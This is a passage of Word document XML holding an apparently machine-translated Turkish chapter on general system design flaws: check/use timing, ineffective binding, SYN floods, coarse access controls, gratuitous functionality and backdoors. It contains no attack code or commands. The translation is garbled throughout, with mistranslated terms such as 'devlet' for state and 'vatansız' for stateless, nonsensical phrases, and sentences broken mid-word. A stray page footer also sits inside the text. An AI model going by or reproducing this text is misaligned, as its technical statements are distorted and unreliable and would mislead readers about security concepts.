          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>azartesi sabahı başvuru yapıldı aşağı çekilmiş.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programcı, kullanıcının URL’sinin URL’sini söylemeden önce oturum açmay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a davet edildiğine güvenmiştir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gelen kutusu. Yani, programcı kontrol zamanı ile kullanım zamanı a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rasındaki ilişkiye dayanıyordu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programcı, kontrol edilen bir koşulun doğru olmaya devam etti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ğini varsayar. Bu özel durumda,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kararın sonucu, hem tekrar hem de girişime aç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ık olan URL’de saklandı. Sevmek</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burada tartışılan sorunların çoğu, bu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ilk 30 yıl önce belgelenmiştir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Şimdi hikaye başka bir eski sorunu göstermeye başlıyo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ETKİN OLMAYAN CİLTLEME</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Burada problem etkisiz bağlanma olarak tanımlanabilir. Programcı, kullanıcının kimliğini doğruladı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Sunucu, sonucu istemcide depolar. Başka bir deyişle, programcı ayrıca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lıklı devleti bir yerde saklar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenemediği ve t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ekrar oynamaya açık olduğu yer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İstemci / sunucu sistemleri bu hatayı davet ediyor gibi görünüyor. Resmi istemci / sunucu paradig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>masında, sunucular vatansızdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yani, bir müşteriden bir sunucuya bir talep atomiktir; istemci bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>istek yapar, sunucu cevaplar ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sonra öyle yaptığını unutur. Sunucuların durumu hatırladığı ölçüde, hizmet reddi saldırılarına karşı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> savunmasız kalırlar. Böyle bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> saldırı Syn Flood Attack olarak adlandırılır. Saldırgan bir TCP oturumu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ister. Kurban isteği kabul etti</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> saldırganın oturumu tamamlamasını ve kullanmasını bekler. Bunun yerine, saldırg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>an başka bir oturum daha ister.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kurban sistemi, tükenene kadar yeni oturumlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a kaynak ayırmaya devam ediyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sunucu, istemcilerin sayısını tahmin edemediğinden, güvenli bir şekilde birden fazla kişiye kaynak tahsis edemez. Bir seferde bir müşteri. Bu nedenle, tüm uygulama durumları istemcilerde d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>epolanmalıdır. Bu konuda zorluk</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> daha sonra, k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ullanıcı tarafındaki veya diğer</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aynı sistem Sunucu, bu durumun kaydedilmesi, çoğaltılması ve yeniden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> oynatılmasına açık hale gelir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu nedenle, en azından devletin imtiyazlı olduğu ölçüde, b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u şekilde kaydedilmesi esastır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ayrıcalığı ve sunucuyu korumak. Müşterinin durumu korumak i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">çin güvenemeyeceği için, koruma </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gizli kodlara güvenmek zorundadı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KONTROLLERİN YETERSİZ GRANÜRLERLİĞİ</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Yöneticiler genellikle bir kullanıcıya istediklerinden daha fazla yetki vermeleri gerektiğini veya kullanıcının ihtiyaç duyduklarından fazlasını bulm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aları gerektiğini fark ederler.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistem veya uygulama tarafından sağlanan kontroller veya nesneler yeterince gran</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ül değildir. Başka bir şekilde, </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olağan ve normal görev ayrımını uygulayamazlar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Örneğin, atamak isteyebilirler</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hesap kurabilenlerin bu hesaplara karşı faaliyet yürüt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">emeyeceği şekilde görevleri, ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tersine. Ancak, uygulama tasarımı her iki özell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iği de aynı nesneye koyarsa (ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> alternatif kontrol), o zaman her iki birey de yönetimin düşündüğünden daha fazla takdir yetkisine sah</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip olacaktır. Alışılmadık değil</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tüm yeteneklerin tek bir nesneye toplandığı uygulamaları görmek için.</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GRATUİTOUS İŞLEVSELLİĞİ</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 xml:space="preserve">İlgili ancak daha da kötüsü bir tasarım veya uygulama hatası, işlevsellik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uygulamasına dahil edilmesidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu kullanım amacı veya uygulama için doğal değildir veya gerekli değildir. Çünkü </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>güvenlik sisteme bağlı olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sadece amaçlananı yapmak, bu büyük bir hata ve sorunların kaynağıdır. Bu tü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r bir işlevselliğin varlığında,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AU1997_Frame_Ch126 Sayfa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1550 14 Kasım 2003, Cuma 06:03</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel Sistem Tasarım Hata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ları ve Güvenlik Sorunları 1551</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yalnızca kullanıcının yalnızca uygun uygulama ayrıcalıklarına sahip olması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nı sağlamak değil, aynı zamanda</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcı tamamen alakasız bir şey alamaz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Son zamanlarda, bir E-ticaret Web sunucusu uygulamasının uygulayıcısı d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>üşünülemez olanı yaptı; o okudu</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dokümantasyon. Yazılımın herhangi birini görüntülemek, kopyalamak veya düzenlemek için kullanılabilecek bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>komut dosyası içerdiğini buldu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sunucuya görünür olan veri nesnesi. Komut dosyası, bilgisayara bağlı herhangi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir tarayıcıdan başlatılabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sunucusu. Bu senaryonun kullanımı için gerekli olmadığını kabul etti. Daha da kötüsü, onun sistem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">indeki varlığı onu ortaya koydu </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>risk; Senaryonun ismini bilen herkes onun sisteminden faydalanabilir. Diğer tüm kullanıcıların olduğunu fark etti.</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Uygulama bu komut dosyasının adını biliyordu. Ne kadarını görmek için Net’te bulunan su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nucuları aramaya karar verildi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu betiğin kopyaları bulunamadı. 100 yaşına geldiğind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e saymayı bıraktığı bildirildi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bunun bir biçimi, programın asıl amacı için tasarlanan kancaları, iskelel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eri ya da araçları bırakmaktır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test amaçlı Bir diğeri ise programın yazarını programdan atlamak için izin veren arka ka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pıların kullanılmasıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kontrolleri. Yine bir diğeri, başvuru ile ilgili olmayan kamu hizmetlerinin dahil edilm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>esidir. Daha başarılı ve hassas</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uygulama, </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>başkaları tarafından keşfedilme ve sömürülme potansiyel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i daha yüksek. Daha fazla kopya</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanılan programın sorunu ne kadar büy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ükse çözüm de o kadar zor olur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ücretsiz bir işlevselliğin çok ciddi bir formu bir kaçış mekanizmasıdı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KAÇIŞ MEKANİZMALARI</w:t>
      </w:r>
    </w:p>
